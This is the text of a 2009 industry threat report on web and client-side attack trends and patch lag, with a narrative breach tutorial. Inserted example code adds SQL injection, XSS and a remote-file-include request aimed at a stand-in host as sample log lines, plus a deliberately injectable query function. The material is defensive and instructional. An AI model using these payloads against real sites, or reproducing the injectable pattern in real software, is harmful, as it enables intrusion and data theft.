Top Cyber Security Risks September 2009


  • 8/3/2019 Top Cyber Security Risks September 2009

    1/24

The Top Cyber Security Risks

Two risks dwarf all others, but organizations fail to mitigate them

Featuring attack data from TippingPoint intrusion prevention systems protecting 6,000 organizations, vulnerability data from 9,000,000 systems compiled by Qualys, and additional analysis and tutorial by the Internet Storm Center and key SANS faculty members.

September 2009

Contents .... 1
Executive summary .... 2
Overview .... 4
Vulnerability exploitation trends .... 5
  Application vulnerabilities exceed OS vulnerabilities .... 5
  Web application attacks .... 5
  Windows: Conficker/Downadup .... 6
  Apple: QuickTime and six more .... 7
  Origin and destination analysis for four key attacks .... 7
Application patching is much slower than operating system patching .... 14
Tutorial: Real-life HTTP client-side exploitation example .... 18
  Step 0: Attacker places content on trusted site .... 18
  Step 1: Client-side exploitation .... 19
  Step 2: Establish reverse shell backdoor using HTTPS .... 19
  Steps 3 and 4: Dump hashes and use pass-the-hash attack to pivot .... 20
  Step 5: Pass the hash to compromise domain controller .... 20
  Steps 6 and 7: Exfiltration .... 21
Zero-day vulnerability trends .... 21
Best practices in mitigation and control of the top risks .... 23
  Critical Controls - As Applied to HTTP Server Threats .... 23

    1


    The Top Cyber Security Risks September 2009


Executive Summary

Priority One: Client-side software that remains unpatched.

Waves of targeted email attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites. (See Priority Two below for how they compromise the web sites.) Because the visitors feel safe downloading documents from the trusted sites, they are easily fooled into opening documents, music and video that exploit client-side vulnerabilities. Some exploits do not even require the user to open documents. Simply accessing an infected website is all that is needed to compromise the client software. The victims' infected computers are then used to propagate the infection and compromise other internal computers and sensitive servers incorrectly thought to be protected from unauthorized access by external entities. In many cases, the ultimate goal of the attacker is to steal data from the target organizations and also to install back doors through which the attackers can return for further exploitation. On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities. In other words, the highest priority risk is getting less attention than the lower priority risk.

Priority Two: Internet-facing web sites that are vulnerable.

Attacks against web applications constitute more than 60% of the total attack attempts observed on the Internet. These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications account for more than 80% of the vulnerabilities being discovered. Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most web site owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors that trusted those sites to provide a safe web experience.

Operating systems continue to have fewer remotely-exploitable vulnerabilities that lead to massive Internet worms.

Other than Conficker/Downadup, no new major worms for OSs were seen in the wild during the reporting period. Even so, the number of attacks against buffer overflow vulnerabilities in Windows tripled from May-June to July-August and constituted over 90% of attacks seen against the Windows operating system.


Rising numbers of zero-day vulnerabilities.

World-wide there has been a significant increase over the past three years in the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times. Some vulnerabilities have remained unpatched for as long as two years. There is a corresponding shortage of highly skilled vulnerability researchers working for government and software vendors. So long as that shortage exists, the defenders will be at a significant disadvantage in protecting their systems against zero-day attacks. A large decline in the number of PHP File Include attacks appears to reflect improved processes used by application developers, system administrators, and other security professionals.


Overview

Throughout the developed world, governments, defense organizations, and companies in finance, power, and telecommunications are increasingly targeted by overlapping surges of cyber attacks from criminals and nation-states seeking economic or military advantage. The number of attacks is now so large and their sophistication so great that many organizations are having trouble determining which new threats and vulnerabilities pose the greatest risk and how resources should be allocated to ensure that the most probable and damaging attacks are dealt with first. Exacerbating the problem is that most organizations do not have an Internet-wide view of the attacks.

This report uses current data covering March 2009 to August 2009 from appliances and software in thousands of targeted organizations to provide a reliable portrait of the attacks being launched and the vulnerabilities they exploit. The report's purpose is to document existing and emerging threats that pose significant risk to networks and the critical information that is generated, processed, transmitted, and stored on those networks. This report summarizes vulnerability and attack trends, focusing on those threats that have the greatest potential to negatively impact your network and your business. It identifies key elements that enable these threats and associates these key elements with security controls that can mitigate your risk.

The report's target audience is major organizations that want to ensure their defenses are up-to-date and are tuned to respond to today's newest attacks and to the most pressing vulnerabilities. Data on actual attacks comes from intrusion prevention appliances deployed by TippingPoint that protect more than 6,000 companies and government agencies. Data on vulnerabilities that remain unpatched comes from appliances and software deployed by Qualys that monitor vulnerabilities and configuration errors in more than 9,000,000 systems, scanned more than 100,000,000 times so far in 2009. The patterns in the data are vetted by the senior staff at the Internet Storm Center and by the faculty of the SANS Institute responsible for SANS programs in hacker exploits, penetration testing, and forensics. In other words, these findings reflect a fusion of data and experience never before brought together.

The report also includes a pictorial description/tutorial on how some of the most damaging current attacks actually work. One of the most important findings in cybersecurity over the past several years has been the understanding, most often asserted by White House officials, that offense must inform defense. Only people who understand how attacks are carried out can be expected to be effective defenders. The tutorial shows what actually happened in a very damaging attack and is excerpted from Ed Skoudis' SANS Hacker Exploits and Incident Handling class. It is included to boost defenders' understanding of current attack techniques.


The report was compiled by Rohit Dhamankar, Mike Dausin, Marc Eisenbarth and James King of TippingPoint with assistance from Wolfgang Kandek of Qualys, Johannes Ullrich of the Internet Storm Center, and Ed Skoudis and Rob Lee of the SANS Institute faculty.

Vulnerability Exploitation Trends

Application Vulnerabilities Exceed OS Vulnerabilities

During the last few years, the number of vulnerabilities being discovered in applications has been far greater than the number of vulnerabilities discovered in operating systems. As a result, more exploitation attempts are recorded against application programs. The most popular applications for exploitation tend to change over time, since the rationale for targeting a particular application often depends on factors like prevalence or the inability to effectively patch. Due to the current trend of converting trusted web sites into malicious servers, browsers and client-side applications that can be invoked by browsers seem to be consistently targeted.

Figure 1: Number of Vulnerabilities in Network, OS and Applications

Web Application Attacks

There appear to be two main avenues for exploiting and compromising web servers: brute force password guessing attacks and web application attacks. Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified. SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites. Automated tools, designed to target custom web application vulnerabilities, make it easy to discover and infect several thousand web sites.


Windows: Conficker/Downadup

Attacks on Microsoft Windows operating systems were dominated by Conficker/Downadup worm variants. For the past six months, over 90% of the attacks recorded for Microsoft targeted the buffer overflow vulnerability described in Microsoft Security Bulletin MS08-067. Although in much smaller proportion, Sasser and Blaster, the infamous worms from 2003 and 2004, continue to infect many networks.

Figure 2: Attacks on Critical Microsoft Vulnerabilities (last 6 months)

Figure 3: Attacks on Critical Microsoft Vulnerabilities (last 6 months)


Apple: QuickTime and Six More

Apple has released patches for many vulnerabilities in QuickTime over the past year. QuickTime vulnerabilities account for most of the attacks that are being launched against Apple software. Note that QuickTime runs on both Mac and Windows operating systems. The following vulnerabilities should be patched for any QuickTime installations: CVE-2009-0007, CVE-2009-0003, CVE-2009-0957.

Figure 4: Attacks on Critical Apple Vulnerabilities (last 6 months)

Origin and Destination Analysis for Four Key Attacks

Over the past six months, we have seen some very interesting trends when comparing the country where various attacks originate to the country of the attack destination. In order to show these results, we have characterized and presented the data in relation to the most prevalent attack categories. The analysis performed for this report identified these attack categories as high-risk threats to most if not all networks, and as such, they should be at the forefront of security practitioners' minds. These categories are Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and finally SQL Injection attacks. As you might expect, there is some overlap in these categories, with the latter three being subsets of the first two categories. However, the trends we see in separating this data are worth pointing out.

The SQL Injection attacks that compose this category include SQL Injection using SELECT SQL Statement, SQL Injection Evasion using String Functions, and SQL Injection using Boolean Identity. The most prominent PHP Remote File Include attack is one that looks for a very small HTTP request that includes a link to another website as a parameter that contains a very specific evasion technique used by a number of attacks


to increase the reliability of their attacks. Also of note is a very specific attack against the Zeroboard PHP application, the only single application that made the top attacks. The final type of attack included in these statistics is one of the more popular HTTP Connect Tunnel attacks, which remains a staple in the Server-Side HTTP category. The HTTP connect tunnels are used for sending spam emails via mis-configured HTTP servers.
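As an added illustration of the categories named above (example code written for this edit, not TippingPoint's filters or anything from the report), the following Python classifies constructed web-server access-log lines into the report's three SQL Injection sub-categories, PHP Remote File Include (a URL passed as a parameter) and Cross-site Scripting; the log lines, the IP addresses and the simplified patterns are all assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache combined-style prefix); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jul/2009:23:15:02 -0400] "GET /products.php?id=7 HTTP/1.1" 200 512
203.0.113.5 - - [04/Jul/2009:23:15:09 -0400] "GET /products.php?id=7+UNION+SELECT+user,pass+FROM+users HTTP/1.1" 200 812
198.51.100.9 - - [04/Jul/2009:23:16:41 -0400] "GET /login.php?user=admin'+OR+'1'%3D'1 HTTP/1.1" 200 331
198.51.100.9 - - [04/Jul/2009:23:17:03 -0400] "GET /search.php?q=x'%3BSELECT+CHAR(115)%2BCHAR(101)-- HTTP/1.1" 500 0
192.0.2.77 - - [04/Jul/2009:23:18:20 -0400] "GET /index.php?page=http://203.0.113.66/c.txt? HTTP/1.1" 200 200
192.0.2.78 - - [04/Jul/2009:23:19:11 -0400] "GET /comment.php?msg=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 150
"""

# Category names follow the report; the regexes are this example's own rough
# approximations of each pattern (assumption), not the IPS vendor's signatures.
CATEGORIES = [
    ("SQL Injection using SELECT SQL Statement",
     re.compile(r"\bunion\b\s+(?:all\s+)?select\b|\bselect\b.+\bfrom\b|;\s*select\b", re.I)),
    ("SQL Injection Evasion using String Functions",
     re.compile(r"\b(?:char|chr|concat|substring|ascii)\s*\(", re.I)),
    # "Boolean Identity": OR followed by a comparison whose two sides are the same token.
    ("SQL Injection using Boolean Identity",
     re.compile(r"\bor\b\s*'?(\w+)'?\s*=\s*'?\1'?", re.I)),
    # A parameter whose value is itself a URL to another host.
    ("PHP Remote File Include",
     re.compile(r"^\s*(?:https?|ftp)://", re.I)),
    ("Cross-site Scripting",
     re.compile(r"<\s*script\b|javascript\s*:|\bon\w+\s*=", re.I)),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_target(target: str) -> list:
    """Return the distinct categories matched by any decoded query value of one request target."""
    found = []
    # parse_qsl percent-decodes values and turns '+' into spaces, so the
    # patterns run over what the application would actually receive.
    for _key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for name, pattern in CATEGORIES:
            if name not in found and pattern.search(value):
                found.append(name)
    return found


def classify_log(text: str) -> list:
    """Parse each log line and keep only requests that match at least one category."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        categories = classify_target(m["target"])
        if categories:
            hits.append({"ip": m["ip"], "target": m["target"], "categories": categories})
    return hits


def count_by_category(hits: list) -> dict:
    """Aggregate hits per category, the way the report's per-category charts do."""
    counts = {}
    for hit in hits:
        for category in hit["categories"]:
            counts[category] = counts.get(category, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in classify_log(SAMPLE_LOG):
        print(hit["ip"], hit["target"], hit["categories"])
    print(count_by_category(classify_log(SAMPLE_LOG)))
```

A request can fall into more than one category, as the string-function line does, which mirrors the overlap the report notes between its categories.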

Looking at the breakdown by country, we see that the United States is by far the major attack target for the Server-Side HTTP attack category (Figure 5).

Figure 5: Server-Side HTTP Attacks by Destination Country (last 6 months)

For years, attack targets in the United States have presented greater value propositions for attackers, so this statistic really comes as no surprise.

An interesting spike in Server-Side HTTP attacks occurred in July 2009. This was entirely due to SQL Injection attacks using the SELECT command. Upon looking at the data, we saw a massive campaign by a range of IP addresses located at a very large Internet Service Provider (ISP). In this case, there were a number of machines located at a single colocation site that may have all been compromised with the same vulnerability due to the machines being at the same patch level. In addition, a number of gambling sites took part in this attack, which peaked after hours on July Fourth, a major holiday in the United States.


Figure 6: Server-Side HTTP Attacks (last 6 months)

Finally, let's turn to the source of these HTTP Server-Side Attacks (Figure 7).

Figure 7: Server-Side HTTP Attacks by Source Country (last 6 months)

Here we see the United States as by far the largest origin, which is a pattern that has continued for some time. In many cases we believe these to be compromised machines that are then being used for further nefarious purposes. The next four offenders on the HTTP Server-Side attacking countries list are Thailand, Taiwan, China, and the Republic of Korea. They also show up in other portions of this report, so this graph will be a useful reference in comparing some of the other attack categories and their relative magnitude.


The last six months have seen a lot of activity with SQL injection attacks. Some typical patterns emerge, with the United States being both the top source of and destination for SQL Injection events.

SQL Injection on the Internet can more or less be divided into two sub-categories: Legitimate SQL Injection and Malicious SQL Injection. Many web applications on the Internet still use SQL Injection for their normal functionality. It should be noted that this is only a difference in intent. The web applications that legitimately use SQL Injection are guaranteed to be vulnerable to the tools and techniques used by attackers to perform Malicious SQL Injections. The servers that house these applications may have a higher compromise rate not only because they are known to be vulnerable, but also because they need to distinguish between legitimate and malicious injects to identify attacks.
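As an added example (written for this edit, not code from the report or from any application it describes), the following Python contrasts an application that accepts a raw SQL WHERE fragment as a feature, the "legitimate" injection described above, with an allowlisted, parameterized replacement; the in-memory table, the names and the inputs are constructed, and the identity and char() inputs correspond to the report's Boolean Identity and String Functions categories.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def report_with_sql_fragment(conn: sqlite3.Connection, where_fragment: str) -> list:
    """'Legitimate SQL Injection': the request supplies a raw WHERE clause by design.

    Whatever is placed in that parameter runs as SQL, so the same code path
    serves an intended filter such as "role = 'user'" and a malicious one.
    """
    sql = "SELECT name, role FROM users WHERE " + where_fragment + " ORDER BY name"
    return conn.execute(sql).fetchall()


# Hardened form: the client may only choose a field name from this allowlist;
# the comparison value is always bound as a parameter, never spliced into SQL.
ALLOWED_FILTERS = {"role": "role = ?", "name": "name = ?"}


def report_with_allowlist(conn: sqlite3.Connection, field: str, value: str) -> list:
    clause = ALLOWED_FILTERS.get(field)
    if clause is None:
        raise ValueError(f"unsupported filter field: {field!r}")
    sql = "SELECT name, role FROM users WHERE " + clause + " ORDER BY name"
    return conn.execute(sql, (value,)).fetchall()


def allowlist_rejects(conn: sqlite3.Connection, field: str, value: str = "x") -> bool:
    """True when the hardened report refuses the requested field outright."""
    try:
        report_with_allowlist(conn, field, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # Intended use of the feature.
    print(report_with_sql_fragment(db, "role = 'user'"))
    # Boolean identity: the tautology makes the filter match every row.
    print(report_with_sql_fragment(db, "role = 'user' OR '1'='1'"))
    # String-function evasion: the literal 'alice' never appears in the request.
    print(report_with_sql_fragment(db, "name = char(97,108,105,99,101)"))
    # Hardened form: the same text is just a value that matches no role.
    print(report_with_allowlist(db, "role", "user' OR '1'='1"))
    print(allowlist_rejects(db, "role = 'user' OR '1'='1'"))
```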

Figure 8: SQL Injection Attacks by Destination Country (last 6 months)

Looking at the magnitude of these attacks broken down by month (Figure 9), we see the large-scale SQL Injection campaign pointed out in the Server-Side HTTP Attack section. A very large spike in SQL Injection attacks in July was caused mostly by an online advertiser who distributed code to many affiliates using SQL injection as functionality. The application was quickly pulled, resulting in a large drop in events for the month of August.


Figure 9: SQL Injection Attacks (last 6 months)

The source distribution of many of these attacks is much more diverse than the destination. China is now the single largest source outside of the United States. Again, the overwhelming destination for these events is in the United States (Figure 10).

Figure 10: SQL Injection Attacks by Source Country (6 months)

In conclusion, we cannot overstate the importance of protecting DMZ-based web applications from SQL Injection attacks. Increasingly, the ultimate objective of attackers is the acquisition of sensitive data. While the media may consistently report attacker targets as being credit cards and social security numbers, that is more due to the popular understanding of the marketability of this data. They are not the only valuable data types


that can be compromised. Since SQL Injection attacks offer such easy access to data, it should be assumed that any valuable data stored in a database accessed by a web server is being targeted.

Although PHP File Include attacks have been popular, we have seen a notable decline in the overall number of attacks that have taken place. With the exception of a major attack originating from Thailand in April, the number of PHP File Include attacks in August is less than half the March/May average.

There are many ways to protect against these attacks. Apache configuration, input sanitization, and network security equipment are all very good at deterring these attacks, so it seems likely that the drop in total attacks is at least partly due to a positive response by application developers, system administrators, and security professionals. However, due to the extreme ease with which these attacks are carried out, and the enormous benefit of a successful attack (arbitrary PHP code is executed), attacks such as these are likely to remain popular for some time.

Figure 11: PHP Remote File Include Attacks (last 6 months)

Let us look at the sources of PHP Remote File Include attacks. A major attack campaign was launched out of Thailand in April that caused Thailand to show up at number 1 in this list.


Figure 12: PHP Remote File Include Attacks by Source Country (6 months)

Cross Site Scripting (XSS) is one of the most prevalent bugs in today's web applications. Unfortunately, developers often fall into the trap of introducing XSS bugs while creating custom code that connects all of the diverse web technologies that are so prevalent in today's Web 2.0 world. Another very common use of XSS is by various advertisers' analytic systems. For example, an advertiser's banner might be embedded in a web page which is set up to reflect some JavaScript off of the advertiser's HTTP server for tracking purposes. However, in this case, there is little risk because the site in question (usually) has full control over its own page, so this request to the advertiser is not generally malicious. It is the reflection attacks, along with attacks that leverage flaws in form data handling, that make up the vast majority of XSS attacks that we have seen in the last six months.

Figure 13: XSS Attacks by Source Country (last 6 months)


Attacks sourced from the United States have been on a steady decline month-over-month. The Republic of Korea has seen a 50% reduction in the last 30 days. These two events, however, have been offset by a sudden 20% increase in the last 30 days in attacks from Australia. The other three major players, namely Hong Kong, China and Taiwan, have remained stable over the past three-month period in this category.

Application Patching is Much Slower than Operating System Patching

Qualys scanners collect anonymized data of detected vulnerabilities to capture the changing dynamics in the vulnerability assessment field. The data documents changes such as the decline of server-side vulnerabilities and the corresponding rise of vulnerabilities on the client side, both in operating system components and applications. A Top 30 ranking is often used to see if major changes occur in the most frequent vulnerabilities found. Here is the ranking for the first half of 2009, edited to remove irrelevant data points such as 0-day vulnerabilities.

Description

WordPad and Office Text Converters Remote Code Execution Vulnerability (MS09-010)
Sun Java Multiple Vulnerabilities (244988 and others)
Sun Java Web Start Multiple Vulnerabilities May Allow Elevation of Privileges (238905)
Java Runtime Environment Virtual Machine May Allow Elevation of Privileges (238967)
Adobe Acrobat and Adobe Reader Buffer Overflow (APSA09-01)
Microsoft SMB Remote Code Execution Vulnerability (MS09-001)
Sun Java Runtime Environment GIF Images Buffer Overflow Vulnerability
Microsoft Excel Remote Code Execution Vulnerability (MS09-009)
Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01)
Sun Java JDK JRE Multiple Vulnerabilities (254569)
Microsoft Windows Server Service Could Allow Remote Code Execution (MS08-067)
Microsoft Office PowerPoint Could Allow Remote Code Execution (MS09-017)
Microsoft XML Core Services Remote Code Execution Vulnerability (MS08-069)
Microsoft Visual Basic Runtime Extended Files Remote Code Execution Vulnerability (MS08-070)
Microsoft Excel Multiple Remote Code Execution Vulnerabilities (MS08-074)
Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (MS09-028)
Microsoft Word Multiple Remote Code Execution Vulnerabilities (MS08-072)
Adobe Flash Player Multiple Vulnerabilities (APSB07-20)
Adobe Flash Player Multiple Security Vulnerabilities (APSB08-20)
Third Party CAPICOM.DLL Remote Code Execution Vulnerability
Microsoft Windows Media Components Remote Code Execution Vulnerability (MS08-076)
Adobe Flash Player Multiple Vulnerabilities (APSB07-12)
Microsoft Office Remote Code Execution Vulnerability (MS08-055)


Adobe Reader JavaScript Methods Memory Corruption Vulnerability (APSA09-02 and APSB09-06)
Microsoft PowerPoint Could Allow Remote Code Execution (MS08-051)
Processing Font Vulnerability in JRE May Allow Elevation of Privileges (238666)
Microsoft Office Could Allow Remote Code Execution (MS08-016)
Adobe Acrobat/Reader util.print() Buffer Overflow Vulnerability (APSB08-19)
Adobe Acrobat and Adobe Reader Multiple Vulnerabilities (APSB08-15)
Windows Schannel Security Package Could Allow Spoofing Vulnerability (MS09-007)

Table 1: Qualys Top 30 in H1 2009

Some of the vulnerabilities listed in the table get quickly addressed by IT administrators; vulnerabilities in the base operating system class, for example, show a significant drop in even the first 15 days of their lifetime:

Figure 14: Microsoft OS Vulnerabilities

But at least half of the vulnerabilities in the list, primarily vulnerabilities found in applications, receive less attention and get patched on a much slower timeline. Some of these applications, such as Microsoft Office and Adobe Reader, are very widely installed and so expose the many systems they run on to long-lived threats. The following graphs plot the number of vulnerabilities detected for Microsoft Office and Adobe Reader, normalized to the maximum number of vulnerabilities detected in the timeframe. Periodic drops in detection rates occur during the weekends, when scanning focuses on servers rather than desktop machines and the detection rates of vulnerabilities related to desktop software fall accordingly.


Figure 15: Microsoft PowerPoint and Adobe Vulnerabilities Patching Cycles

Attackers have long picked up on this opportunity and have switched to different types of attacks in order to take advantage of these vulnerabilities, using social engineering techniques to lure end-users into opening documents received by e-mail or by infecting websites with links to documents that have attacks for these vulnerabilities embedded. These infected documents are not only placed on popular web sites that have a large number of visitors, but increasingly target the long tail, the thousands of specialized websites that have smaller but very faithful audiences. By identifying and exploiting vulnerabilities in the Content Management Systems used by these sites, attackers can automate the infection process and reach thousands of sites in a matter of hours. Attacks


using PDF vulnerabilities have seen a large increase in late 2008 and 2009 as it became clear to attackers how easy it is to use this method of getting control over a machine.

Adobe Flash has similar problems with the application of its updates; there are four Flash vulnerabilities in our Top 30 list that date back as far as 2007:

Figure 16: Flash Vulnerabilities

Flash presents additional challenges: it does not have its own automatic update mechanism, and one needs to patch Internet Explorer in a separate step from other browsers. For users that have more than one browser installed, it is quite easy to forget to completely close Flash vulnerabilities and continue to be unwillingly vulnerable.

One of the other software families that is high on the Top 30 list is Java, which is widely installed for running Java applets in the common browsers and also increasingly for normal applications. It is quite slow in the patch cycle, with actually increasing numbers of total vulnerabilities as the introduction of new vulnerabilities outweighs the effect of patching. Java has the additional problem that until recently new versions did not uninstall the older code, but only pointed default execution paths to the new, fixed version; attack code could be engineered to take advantage of the well-known paths and continue to use older and vulnerable Java engines.


Figure 17: Sun Java Vulnerabilities

Tutorial: Real Life HTTP Client-side Exploitation Example

This section illustrates an example of a real life attack conducted against an organization that resulted in loss of critical data for the organization.

In this attack, Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today: exploitation of client-side software and pass-the-hash attacks against Windows machines.

Step 0: Attacker Places Content on Trusted Site

In Step 0, the attacker begins by placing content on a trusted third-party website, such as a social networking, blogging, photo sharing, or video sharing website, or any other web server that hosts content posted by public users. The attacker's content includes exploitation code for unpatched client-side software.


Step 1: Client-Side Exploitation

In Step 1, a user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, such as a media player (e.g., Real Player, Windows Media Player, iTunes, etc.), document display program (e.g., Acrobat Reader), or a component of an office suite (e.g., Microsoft Word, Excel, PowerPoint, etc.). Upon receiving the attacker's content from the site, the victim user's browser invokes the vulnerable client-side program, passing it the attacker's exploit code. This exploit code allows the attacker to install or execute programs of the attacker's choosing on the victim machine, using the privileges of the user who ran the browser. The attack is partially mitigated because this victim user does not have administrator credentials on this system. Still, the attacker can run programs with those limited user privileges.

Step 2: Establish Reverse Shell Backdoor Using HTTPS

In Step 2, the attacker's exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access to the victim machine, communicating between this system and the attacker using outbound HTTPS access from victim to attacker. The backdoor traffic therefore appears to be regular encrypted outbound web traffic as far as the enterprise firewall and network are concerned.


Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot

In Step 3, the attacker uses shell access on the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited privilege user account to full system privileges on this machine. Although vendors frequently release patches to stop local privilege escalation attacks, many organizations do not deploy such patches quickly, because such enterprises tend to focus exclusively on patching remotely exploitable flaws. The attacker now dumps the password hashes for all accounts on this local machine, including a local administrator account on the system.

In Step 4, instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network, a fully patched client system on which this same victim user has full administrative privileges. Using NTLMv1 or NTLMv2, Windows machines authenticate network access for the Server Message Block (SMB) protocol based on user hashes and not the passwords themselves, allowing the attacker to get access to the file system or run programs on the fully patched system with local administrator privileges. Using these privileges, the attacker now dumps the password hashes for all local accounts on this fully patched Windows machine.

Step 5: Pass the Hash to Compromise Domain Controller

In Step 5, the attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller system, again using a pass-the-hash attack to gain shell access on the domain controller. Because the password for the local administrator account is identical to the password for a domain administrator account, the password hashes for the two accounts are identical. Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain.
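Why the identical password in Step 5 yields an identical hash, and why the Step 4 pivot needed no cracking: the NT hash is an unsalted MD4 of the UTF-16LE password, so the same password produces the same hash on every machine and in every domain, and a defender can audit for exactly the reuse the attacker relied on by grouping dumped hashes. The block below is an added example, not code from the report; the MD4 is a pure-Python implementation, and the host names, account names, passwords and the (host, account, hash) record format it audits are constructed.

```python
import struct
from collections import defaultdict
MASK = 0xFFFFFFFF

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320): no salt and no per-host secret."""
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (mix function, additive constant, shift table, word order)
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         [(i % 4) * 4 + i // 4 for i in range(16)]),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, w in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[w] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so the next step updates d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 over the UTF-16LE password, unsalted."""
    return md4(password.encode("utf-16-le")).hex()

def shared_hash_accounts(records):
    """Group (host, account, nt_hash) audit records by hash; a hash shared by
    several accounts means a shared password, i.e. a pass-the-hash pivot path."""
    by_hash = defaultdict(list)
    for host, account, h in records:
        by_hash[h.lower()].append(f"{host}\\{account}")
    return {h: accts for h, accts in by_hash.items() if len(accts) > 1}

# Constructed audit records: hosts, accounts and passwords are made up.
AUDIT = [
    ("WS01", "Administrator", nt_hash("Winter2009!")),  # local admin dumped in Step 3
    ("WS02", "Administrator", nt_hash("Winter2009!")),  # local admin reached in Step 4
    ("ACME", "dadmin", nt_hash("Winter2009!")),         # domain admin used in Step 5
    ("ACME", "svc_backup", nt_hash("c0rrectH0rse-staple")),
]
if __name__ == "__main__":
    for h, accts in shared_hash_accounts(AUDIT).items():
        print(h, "is shared by", accts)
```

Any hash group spanning a local administrator and a domain account is the condition Step 5 exploits; eliminating it (unique local administrator passwords per host) breaks the pivot without touching the client-side vulnerability.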


Steps 6 and 7: Exfiltration

In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization. In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.

Zero-Day Vulnerability Trends

A zero-day vulnerability occurs when a flaw in software code is discovered and code exploiting the flaw appears before a fix or patch is available. Once a working exploit of the vulnerability has been released into the wild, users of the affected software will continue to be compromised until a software patch is available or some form of mitigation is taken by the user.

File format vulnerabilities continue to be the first choice for attackers to conduct zero-day and targeted attacks. Most of the attacks continue to target Adobe PDF, Flash Player and Microsoft Office Suite (PowerPoint, Excel and Word) software. Multiple publicly available fuzzing frameworks make it easier to find these flaws. The vulnerabilities are often found in 3rd-party add-ons to these popular and widespread software suites, making the patching process more complex and increasing their potential value to attackers.

The notable zero-day vulnerabilities during the past 6 months were:

- Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862)
- Microsoft Office Web Components ActiveX Control Code Execution Vulnerability (CVE-2009-1136)
- Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (CVE-2008-0015)
- Microsoft DirectX DirectShow QuickTime Video Remote Code Execution Vulnerability (CVE-2009-1537)
- Adobe Reader Remote Code Execution Vulnerability (CVE-2009-1493)
- Microsoft PowerPoint Remote Code Execution Vulnerability (CVE-2009-0556)

The ease of finding zero-day vulnerabilities is a direct result of an overall increase in the number of people having skills to discover vulnerabilities world-wide. This is evidenced by the fact that TippingPoint DVLabs often receives the same vulnerabilities from multiple sources.

For example, MS08-031 (Microsoft Internet Explorer DOM Object Heap Overflow Vulnerability) was discovered independently by three researchers. The first researcher submitted a remote IE 6/7 critical vulnerability on Oct 22, 2007. A second independent researcher submitted the same vulnerability on April 23, 2008. A third independent researcher submitted the same vulnerability on May 19, 2008. All three submissions outlined different approaches to auditing and finding the same vulnerability.

